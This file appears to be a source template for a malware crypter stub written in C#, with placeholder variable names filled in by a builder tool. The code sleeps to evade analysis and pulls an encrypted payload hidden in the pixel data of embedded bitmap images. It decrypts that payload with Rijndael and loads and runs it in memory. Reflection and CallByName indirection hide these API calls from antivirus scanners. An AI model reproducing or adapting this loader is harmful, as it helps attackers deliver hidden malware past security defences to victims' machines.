using System;
using System.Drawing;
using System.Threading;
using System.Resources;
using System.Reflection;
using System.Windows.Forms;
using Microsoft.VisualBasic;
using System.Drawing.Imaging;
using System.Collections.Generic;
using System.Security.Cryptography;
using System.Runtime.InteropServices;
using System.Runtime.CompilerServices;

%ASSEMBLYINFO%

namespace %VAR0%
{
	class %VAR1%
	{
		%METHODS%
		
		|private static object %VAR29%;|
		|private static Type %VAR30%
		{
			get { return Type.GetType("System.Byte[]"); }
		}|
		
		|private static Type %VAR32%
		{
			get { return Type.GetType("System.Int32"); }
		}|
				
		|static void Main(string[] %VAR2%)
		{
			%VAR24%();
			ResourceManager %VAR3% = %VAR25%();
			byte[] %VAR6% = new byte[0];
			for(int %VAR15% = 0; %VAR15% < %IMGNUM%; %VAR15%++)
			{
				Bitmap %VAR4% = (Bitmap)%VAR3%.GetObject("%IMGNAME%" + %VAR26%(%VAR15%));
				byte[] %VAR14% = %VAR11%(%VAR4%);
				%VAR16%(ref %VAR6%, %VAR6%.Length + %VAR14%.Length);
				%VAR28%(ref %VAR6%, %VAR14%);
			}
			
			byte[] %VAR5% = (byte[])Interaction.CallByName(%VAR3%, "GetObject", CallType.Method, "%KEYNAME%");
			%VAR6% = %VAR9%(%VAR6%, %VAR5%);
			%VAR31%(ref %VAR6%);
			
			Assembly %VAR7% = %VAR23%(%VAR6%);
			%VAR22%((Assembly)%VAR29%, %VAR2%);
		}|
		
		|private static void %VAR31%(ref byte[] %VAR6%)
		{
			byte[] original = (byte[])%VAR6%.Clone();
			for(int %VAR15% = 0; %VAR15% < %VAR6%.Length; %VAR15%++)
				%VAR6%[%VAR15%] = original[original.Length - 1 - %VAR15%];
		}|
		
		|private static void %VAR28%(ref byte[] %VAR6%, byte[] %VAR14%)
		{
			for(int %VAR15% = %VAR6%.Length - %VAR14%.Length; %VAR15% < %VAR6%.Length; %VAR15%++)
				%VAR6%[%VAR15%] = %VAR14%[%VAR15% - %VAR6%.Length + %VAR14%.Length];
		}|

		|private static void %VAR24%()
		{
			foreach(MethodInfo %VAR8% in Type.GetType("System.Threading.Thread").GetMethods())
				if(Interaction.CallByName(%VAR8%, "Name", CallType.Get).ToString() == "Sleep")
					if(%VAR8%.GetParameters().Length == 1)
						if(%VAR33%(%VAR8%).Equals(%VAR32%))
							%VAR8%.Invoke(null, new object[] { %SLEEPTIME% });
		}|
		
		|private static Assembly %VAR23%(byte[] %VAR6%)
		{
			foreach(MethodInfo %VAR8% in Type.GetType("System.Reflection.Assembly").GetMethods())
				if(Interaction.CallByName(%VAR8%, "Name", CallType.Get).ToString() == "Load")
					if(%VAR8%.GetParameters().Length == 1)
						if(%VAR33%(%VAR8%).Equals(%VAR30%))
						{
							%VAR29% = %VAR8%.Invoke(null, new object[] { %VAR6% });
							return (Assembly)%VAR8%.Invoke(null, new object[] { %VAR6% });
						}
			return null;
		}|
		
		|private static Type %VAR33%(MethodInfo %VAR8%)
		{
			return (Type)Interaction.CallByName(%VAR34%(%VAR8%)[0], "ParameterType", CallType.Get);
		}|
		
		|private static ParameterInfo[] %VAR34%(MethodInfo %VAR8%)
		{
			return (ParameterInfo[])Interaction.CallByName(%VAR8%, "GetParameters", CallType.Method);
		}|
		
		|private static string %VAR26%(int %VAR15%)
		{
			return %VAR15%.ToString();
		}|
		
		|public static void %VAR22%(Assembly %VAR7%, string[] %VAR2%)
		{
			%VAR21%(%VAR7%).Invoke(null, new object[] { %VAR2% });			
		}|
		
		|private static MethodInfo %VAR21%(Assembly %VAR7%)
		{
			return %VAR7%.EntryPoint;
		}|
		
		|private static Assembly %VAR19%()
		{
			Type t = Type.GetType("System.Type");
			PropertyInfo %VAR20% = t.GetProperty("Assembly");
			return (Assembly)%VAR20%.GetValue(typeof(%VAR1%), null);
		}|
		
		|private static ResourceManager %VAR25%()
		{
			return new ResourceManager("%RESNAME%", %VAR19%());
		}|
		
		|private static void %VAR16%(ref byte[] %VAR6%, int %VAR17%)
		{
			byte[] %VAR18% = (byte[])%VAR6%.Clone();
			%VAR6% = new byte[%VAR17%];
			Array.Copy(%VAR18%, 0, %VAR6%, 0, %VAR18%.Length);
		}|
		
        |private static byte[] %VAR9%(byte[] %VAR6%, byte[] %VAR5%)
        {
            RijndaelManaged %VAR10% = new RijndaelManaged();
            %VAR10%.Key = %VAR5%;
            return %VAR10%.CreateDecryptor().TransformFinalBlock(%VAR6%, 0, %VAR6%.Length);
        }|

		|private static IntPtr %VAR27%(IntPtr ptr)
		{
			return (IntPtr)((int)ptr + 4);
		}|

		|private static int %VAR35%(byte[] %VAR6%)
		{
			int %VAR13% = 0;
			for(int %VAR15% = 0; %VAR15% < 4; %VAR15%++)
				%VAR13% += %VAR6%[%VAR15%] * (int)Math.Pow(256, %VAR15%);
			return %VAR13%;
		}|

        |private static byte[] %VAR11%(Bitmap %VAR4%)
        {
            BitmapData %VAR12% = %VAR4%.LockBits(new Rectangle(0, 0, %VAR4%.Width, %VAR4%.Height), ImageLockMode.ReadOnly, %VAR4%.PixelFormat);
            byte[] %VAR13% = new byte[4];
            Marshal.Copy(%VAR12%.Scan0, %VAR13%, 0, 4);
            %VAR13% = new byte[%VAR35%(%VAR13%)];
            Marshal.Copy(%VAR27%(%VAR12%.Scan0), %VAR13%, 0, %VAR13%.Length);
            return %VAR13%;
        }|
	}
}